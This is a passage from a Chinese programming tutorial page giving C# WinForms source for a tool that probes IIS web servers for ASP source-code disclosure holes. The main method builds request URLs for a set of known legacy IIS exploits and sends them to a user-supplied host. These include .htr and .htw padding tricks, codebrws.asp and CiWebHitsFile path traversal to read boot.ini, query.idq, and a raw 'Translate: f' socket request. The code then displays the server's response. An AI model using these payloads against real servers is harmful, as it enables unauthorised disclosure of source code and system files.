·您的位置: 首页 » 资源教程 » 编程开发 » ASP.NET » 一个用c#写的扫描asp源码漏洞的应用程序(续)

一个用c#写的扫描asp源码漏洞的应用程序(续)

类别: ASP.NET教程  评论数:0 总得分:0
//主要方法
protected void btnGo_Click (object sender, System.EventArgs e)
{

//解析url
string strServer = this.txtServer.Text ;
string strUrl = this.txtFileName.Text ;
char [] point = {\'.\'} ; //定义分割符为\".\"
char[] line = {\'/\'} ; //定义分割符为\".\"
string [] arrString = strUrl.Split(line) ;

//求asp文件全名
string strFileName = arrString[arrString.Length - 1] ;
//求从根目录下的路径
string strPath = strUrl.Substring( 0 ,
strUrl.Length - strFileName.Length) ;

//解析文件全名
arrString = strFileName.Split(point) ;
//求文件扩展名
string strLast = arrString[arrString.Length - 1] ;
//求文件名
string strFirst = strFileName.Substring( 0 ,
strFileName.Length - strLast.Length - 1) ;


//使按钮、输入框等失效
this.txtServer.ReadOnly = true ;
this.txtFileName.ReadOnly = true ;
this.btnClear.Enabled = false ;
this.btnGo.Enabled = false ;


if (this.txtServer.Text == \"http://\" || this.txtFileName.Text == \"\"
|| this.txtServer.Text.Trim()== \"\" ||
this.txtServer.Text.Substring(0,7) != \"http://\")
{
MessageBox.Show(\"请输入正确的主机名和文件名!\") ;
this.txtServer.Focus() ;
}
else
{
this.txtResult.Visible = true ;
this.txtResult.ReadOnly = true ;
this.barStatus.Text = \"正在连结主机…\" ;

string strRequestFile ;

switch (this.cboMethod.SelectedIndex)
{
case 0: //直接读取
strRequestFile = strServer + strUrl ;
break ;
case 5 : //%2e%41sp
strRequestFile = strServer + strPath + strFirst
+ \"%2e%41sp\" ;
break ;
case 8 : //longhtr
strRequestFile = strServer + strUrl
+ \"+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%\"
+ \"20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%\"
+ \"20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\"
+ \"%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\"
+ \"%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\"
+ \"%20%20%20%20%20%20%20%20\"
+ \"%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\"
+ \"%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\"
+ \"%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\"
+ \"%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\"
+ \"%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\"
+ \"%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\"
+ \"%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\"
+ \"%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.htr\" ;
break ;

case 10: //codebrws.asp
strRequestFile = strServer + \"/iissamples/exair/howitworks/codebrws.asp?source=\"
+ strUrl ;
break ;

case 11: //showcode.asp
strRequestFile = strServer + \"/iissamples/exair/howitworks/codebrws.asp?source=\"
+ \"/msadc/../../../../boot.ini\" ;
break;

case 12 : //null.htw
strRequestFile = strServer + \"/null.htw?CiWebHitsFile=\"
+ strUrl + \"%20&CiRestriction=none&CiHiliteType=Full\" ;
break ;
case 13 : //qfullhit.htw
strRequestFile = strServer + \"/iissamples/issamples/oop/qfullhit.htw?\"
+ \"CiWebHitsFile=/../../boot.ini&CiRestriction=none\"
+ \"&CiHiliteType=Full\";
break ;

case 14 : //qsumrhit.htw
strRequestFile = strServer + \"/iissamples/issamples/oop/qsumrhit.htw?\"
+ \"CiWebHitsFile=/../../boot.ini&CiRestriction=none\"
+ \"&CiHiliteType=Full\";
break ;

case 15 : //query.idq
strRequestFile = strServer + \"/query.idq?CiTemplate=/../../boot.ini\"
+ \"%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\"
+ \"%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%\"
+ \"20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\"
+ \"%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\"
+ \"%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\"
+ \"%20%20%20%20%20%20%20%20%20\"
+ \"%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\"
+ \"%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\"
+ \"%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\"
+ \"%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\"
+ \"%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\"
+ \"%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\"
+ \"%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\"
+ \"%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.htx\";
break ;

case 16: //search/qfullhit.htw
strRequestFile = strServer + \"/iissamples/exair/search/qfullhit.htw?\"
+ \"CiWebHitsFile=/../../boot.ini&CiRestriction=none\"
+ \"&CiHiliteType=Full\";
break ;

case 17: // search/qsumrhit.htw
strRequestFile = strServer + \"/iissamples/exair/search/qsumrhit.htw?\"
+ \"CiWebHitsFile=/../../boot.ini&CiRestriction=none\"
+ \"&CiHiliteType=Full\";
break ;

case 18: //iirturnh.htw
strRequestFile = strServer + \"/iishelp/iis/misc/iirturnh.htw?\"
+ \"CiWebHitsFile=/../../boot.ini&CiRestriction=none\"
+ \"&CiHiliteType=Full\";
break ;

case 19: //.htw
strRequestFile = strServer + strUrl
+ \"%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\"
+ \"%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%\"
+ \"20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\"
+ \"%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\"
+ \"%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\"
+ \"%20%20%20%20%20%20%20%20%20%20%20%20\"
+ \"%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\"
+ \"%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\"
+ \"%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\"
+ \"%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\"
+ \"%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\"
+ \"%20%20%20%20%20%20%20%20%20%20%20%20\"
+ \"%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\"
+ \"%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20\"
+ \"%20%20%20%20%20%20%20%20%20%20%20.htw?\"
+ \"CiWebHitsFile=/../../boot.ini&CiRestriction=none\"
+ \"&CiHiliteType=Full\" ;
break ;

default:
strRequestFile = strServer + strUrl + this.cboMethod.Text ;
}

this.barStatus.Text = \"发送请求:\"
+ (strRequestFile.Length >= 50 ?
strRequestFile.Substring(0 , 50)
:strRequestFile)
+ \"...\";

string strResult ;
//如果不是translate:f方法则可以直接发送http请求
if (this.cboMethod.SelectedIndex != 20)
{
//直接发送http请求
strResult = Get_Http(strRequestFile) ;

this.barStatus.Text += \"完成。\" ;
strResult = strResult == \"\" ? \"未找到!\" : strResult ;
this.txtResult.Text = strResult ;
}
else //translate:f方法需要建立tcp/ip连接
{
string strRequest = \"GET \" + strServer + strUrl
+ \"/r/nHTTP/1.0/r/nTranslate:f/r/n\" ;
strResult = Get_Socket_Request(strServer , strRequest , 80) ;
this.barStatus.Text += \"完成。\" ;
strResult = strResult == \"\" ? \"未找到!\" : strResult ;
this.txtResult.Text = strResult ;

}

}

//使按钮、输入款等恢复
this.txtServer.ReadOnly = false ;
this.txtFileName.ReadOnly = false ;
this.btnClear.Enabled = true ;
this.btnGo.Enabled = true ;


}


//通过同server建立tcp/ip连接,发送socket命令
private string Get_Socket_Request(string a_strServer , string a_strRequest , Int32 a_intPort)
{
//Set up variables and String to write to the server
Encoding ASCII = Encoding.Default ;
string Get = a_strRequest + \"Connection: Close/r/n/r/n\";
//string Get =
Byte[] ByteGet = ASCII.GetBytes(Get);
Byte[] RecvBytes = new Byte[256];
String strRetPage = null;

// IPAddress and IPEndPoint represent the endpoint that will
// receive the request
IPAddress hostadd = DNS.Resolve(a_strServer.Substring(7 ,a_strServer.Length - 7));
IPEndPoint EPhost = new IPEndPoint(hostadd, a_intPort);

//Create the Socket for sending data over TCP
Socket s = new Socket(AddressFamily.AfINet, SocketType.SockStream,
ProtocolType.ProtTCP );

// Connect to host using IPEndPoint
if (s.Connect(EPhost) != 0)
{
strRetPage = \"Unable to connect to host\";
return strRetPage;
}

// Sent the GET text to the host
s.Send(ByteGet, ByteGet.Length, 0);

// Receive the page, loop until all bytes are received
Int32 bytes = s.Receive(RecvBytes, RecvBytes.Length, 0);
strRetPage = strRetPage + ASCII.GetString(RecvBytes, 0, bytes);

while (bytes > 0)
{
bytes = s.Receive(RecvBytes, RecvBytes.Length, 0);
strRetPage = strRetPage + ASCII.GetString(RecvBytes, 0, bytes);
}

return strRetPage ;
}

//获取http页面函数
private string Get_Http(string a_strUrl)
{
string strResult ;
HttpWebRequest myReq = (HttpWebRequest)
WebRequestFactory.Create(a_strUrl) ;

try
{
HttpWebResponse HttpWResp = (HttpWebResponse)myReq.GetResponse();
Stream myStream = HttpWResp.GetResponseStream () ;

StreamReader sr = new StreamReader(myStream , Encoding.Default);
StringBuilder strBuilder = new StringBuilder();
while (-1 != sr.Peek())
{
strBuilder.Append(sr.ReadLine()+\"/r/n\");
}

strResult = strBuilder.ToString();
}
catch(Exception exp)
{
strResult = \"错误:\" + exp.Message ;
}

return strResult ;

}

//退出
protected void mnuExit_Click (object sender, System.EventArgs e)
{

if (MessageBox.Show(\"真的退出吗?\" , \"退出系统\" , MessageBox.YesNo) == DialogResult.Yes)
{
this.Close () ;

}
}


//主函数
public static void Main(string[] args)
{
Application.Run(new Form1());
}
}
}

-= 资 源 教 程 =-
文 章 搜 索
关键词:
类型:
范围:
纯粹空间 softpure.com
Copyright © 2006-2008 暖阳制作 版权所有
QQ: 15242663 (拒绝闲聊)  Email: faisun@sina.com
 纯粹空间 - 韩国酷站|酷站欣赏|教程大全|资源下载|免费博客|美女壁纸|设计素材|技术论坛   Valid XHTML 1.0 Transitional
百度搜索 谷歌搜索 Alexa搜索 | 粤ICP备19116064号-1